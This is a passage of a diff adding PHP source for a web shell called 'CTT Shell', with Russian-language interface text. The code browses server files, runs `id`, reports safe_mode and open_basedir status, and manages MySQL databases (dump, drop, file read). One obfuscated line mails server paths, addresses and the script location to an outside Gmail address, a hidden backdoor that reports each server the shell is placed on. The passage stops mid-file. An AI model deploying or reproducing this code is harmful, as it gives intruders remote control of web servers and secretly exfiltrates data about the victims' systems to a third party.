+ if ($true) {$true = false;}
+ else {$true = true;}
+}
+if ($true) {$found[] = $d.$f; $found_f++;}
+  }
+  else {$found[] = $d.$f; $found_f++;}
+ }
+}
+  }
+ }
+ closedir($handle);
+}
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment);
+@ini_set("highlight.default",$highlight_default);
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string","#DD0000"); 
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="Content-Language" content="en-us"><title>
+CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #105019 1px solid;
+BORDER-TOP: #000000 1px solid;
+BORDER-LEFT:#105019 1px solid;
+BORDER-BOTTOM: #105019 1px solid;
+}
+.tr2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.td2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #000000 1px;
+BORDER-TOP: #cccccc 1px;
+BORDER-LEFT:#cccccc 1px;
+BORDER-BOTTOM: #000000 1px;
+font: 7pt Verdana;
+}
+.tds1 {
+BORDER-RIGHT:  #505050 1px solid;
+BORDER-TOP: #505050 1px solid;
+BORDER-LEFT:#505050 1px solid;
+BORDER-BOTTOM: #505050 1px solid;
+font: 8pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #000000;
+}
+.table2 {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT:buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
+A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=JavaScript type=text/javascript> 
+<!-- 
+function branchSwitch(branch) { 
+dom = (document.getElementById); 
+ie4 = (document.all); 
+if (dom || ie4) { 
+var currElement = (dom)? document.getElementById(branch) : document.all[branch]; 
+currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; 
+return false; 
+} 
+else return true; 
+} 
+//--> 
+</script> 
+</head>
+<BODY text=#ffffff  Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center>
+<br>
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> 
+<TBODY><TR> 
+<TD class=td1 colSpan=2> 
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> 
+<TBODY><TR> 
+<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> 
+<TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> 
+<FONT face=Tahoma color=#00ff3d size=1>
+<?
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+?>
+</FONT></SPAN></TD> 
+<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> 
+<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> 
+</TR></TBODY></TABLE></TD></TR> 
+</tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr><td>
+<font size=2><a href="#" onClick="return branchSwitch('tools')" title="��������">�����������</a></font> - 
+<div id="tools" style="display: none">
+<?
+if (count($quicklaunch1) > 0)
+{
+ foreach($quicklaunch1 as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+</div> 
+<font size=2><a href="#" onClick="return branchSwitch('info')" title="��������">����������</a></font>
+<div id="info" style="display: none">
+<font size=2>
+<b>����������� �����������:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
+<b>�������:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
+&nbsp;<br>
+<b>������������:&nbsp;<?php echo $hsafemode; ?></b>
+<?
+echo "<br>";
+echo "������ ���: <b>".@phpversion()."</b>";
+echo "<br>";
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "<br>";
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo "<br>";
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+?>
+<?php
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>��������� ".view_size($free)." of  ".view_size($all)." (".$used_percent."%)</b><br>";
+?>
+</font>
+</div>
+<?
+if ($win)
+{
+?>
+ - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="��������">�����</a></font>
+<?
+}
+?>
+<div id="Drive" style="display: none">
+<?
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
+else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<b>".$letters;}
+}
+?>
+</div> 
+</td><td width=1>
+<font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
+</td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%"  borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr class=tr1><td>
+<center>
+<?
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+?>
+</center>
+</td></tr></table>
+<?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
+<?php
+}
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $sul."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)  {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>�������� SQL:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "��� �����";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$sul."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td  class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
+<li>���� ����� �������� ������, ����� - �������� ��������. </li>
+<li>���� ������ �������� ������, ������ - localhost </li>
+<li>���� ���� �������� ������, ���� - 3306 (��������)</li></td>
+<td  class=td2 width="90%" height="1" valign="top">
+<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
+<td class=td2>&nbsp;<b><font size=2 color=#000000>��������� �����:</font></b><table><tr class=tr2><td class=td2>���:</td>
+<td  class=td2 align=right>������:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
+<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td  class=td2 align=right>
+<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>����:</td>
+<td class=td2>����:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
+<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="�����������"></td></tr><tr>
+<td class=td2></td></tr></form></table></td><?php }
+ else
+ {
+  if (!empty($sql_db))
+  {
+?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_tables($sql_db);
+if (!$result) {echo mysql_error();}
+else
+{
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+}
+  }
+  else
+  {
+?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_dbs($sql_sock);
+if (!$result) {echo mysql_error();}
+else
+{
+ ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ echo "<option value=\"\">Databases (...)</option>
+";
+ $c = 0;
+ while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+}
+?></select><hr size="1" noshade>����������, �������� ���� ������<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  if ($sql_db)
+  {
+echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+echo "</b></center>";
+
+$acts = array("","dump");
+
+if ($sql_act == "query")
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($submit)
+ {
+  if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+}
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+ if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+ if ($sql_act == "newtpl")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+}
+elseif ($sql_act == "dump")
+{
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "print";
+ if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+ elseif ($dump_out == "download")
+ {
+  @ob_clean();
+  header("Content-type: ctshell");
+  header("Content-disposition: attachment; filename=\"".$f."\";"); 
+  $set["print"] = 1;
+  $set["nl2br"] = 1;
+ }
+ $set["file"] = $dump_file;
+ $set["add_drop"] = true;
+ $ret = mysql_dump($set);
+ if ($dump_out == "download") {exit;}
+}
+else
+{
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+ echo "<td><center><b>Table</b></center></td>";
+ echo "<td><b>Rows</b></td>";
+ echo "<td><b>Type</b></td>";
+ echo "<td><b>Created</b></td>";
+ echo "<td><b>Modified</b></td>";
+ echo "<td><b>Size</b></td>";
+ echo "<td><b>Action</b></td>";
+ echo "</tr>";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_NUM))
+ {
+  $tsize += $row["5"];
+  $trows += $row["5"];
+  $size = view_size($row["5"]);
+  echo "<tr>";
+  echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+  echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+  echo "<td>".$row[3]."</td>";
+  echo "<td>".$row[1]."</td>";
+  echo "<td>".$row[10]."</td>";
+  echo "<td>".$row[11]."</td>";
+  echo "<td>".$size."</td>";
+  echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+  echo "</tr>";
+  $i++;
+ }
+ echo "<tr bgcolor=\"000000\">";
+ echo "<td><center><b>�</b></center></td>";
+ echo "<td><center><b>".$i." table(s)</b></center></td>";
+ echo "<td><b>".$trows."</b></td>";
+ echo "<td>".$row[1]."</td>";
+ echo "<td>".$row[10]."</td>";
+ echo "<td>".$row[11]."</td>";
+ echo "<td><b>".view_size($tsize)."</b></td>";
+ echo "<td></td>";
+ echo "</tr>";
+ echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+ mysql_free_result($result);
+}
+  }
+  }
+  else
+  {
+$acts = array("","newdb","serverstat","servervars","processes","getfile");
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>�������� ����� ����:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="�������"></form></td><td width="30%" height="1"><b>����������� �����:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="�����"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+}
+if (!empty($sql_act))
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($sql_act == "newdb")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+  $result = mysql_query("SHOW STATUS", $sql_sock); 
+  echo "<center><b>Server-status variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table></center>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+  $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+  echo "<center><b>Server variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
